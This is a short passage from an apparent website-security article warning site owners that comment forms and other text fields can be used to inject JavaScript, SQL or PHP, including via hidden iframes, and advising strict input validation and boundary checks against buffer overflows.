Code injection

Code injection into a user-accessible text field

This is the biggest risk for the modern social web, because nearly every website has a comment or feedback form where visitors can enter content and post it to your page for other visitors to see. Now, what happens when you type some Javascript into a comment form on your blog and post it? How about an SQL database query, or some rogue PHP code? How about accessing your site with the malicious code in the address bar?

Attackers will look for any vector that can be used to sneak a line of executable code onto your web server. Remember, all they need is to get one line through, and they’ve got a foothold. For example, an HTML tag called ‘iframe‘ can be used to embed another web page into the host web page. Setting the iframe’s attributes to ‘width=0’ and ‘height=0’ can keep it hidden. But the target of the iframe might be a web server on the other side of the world with a Javascript attack that will steal your user’s data or install malware on your user’s computer. This is just one of the many tricks out there.

To guard against this, make sure every text field on your site uses strict content validation. The standard practice is to deny all HTML tags except a few for content markup. The code on your server which accepts text input from users should also be screening out any input that goes out of bounds – this is to prevent the common ‘buffer overflow’ attack, where innocent text is typed in first, followed by harmful code which is intended to overflow the data space your server is using to read the text, and hopefully be executed. To prevent buffer overflows, your server code should also be checking the boundaries of all input fields.

Website security is a deep subject, but this article should at least give you a few hints to watch for the most common problems.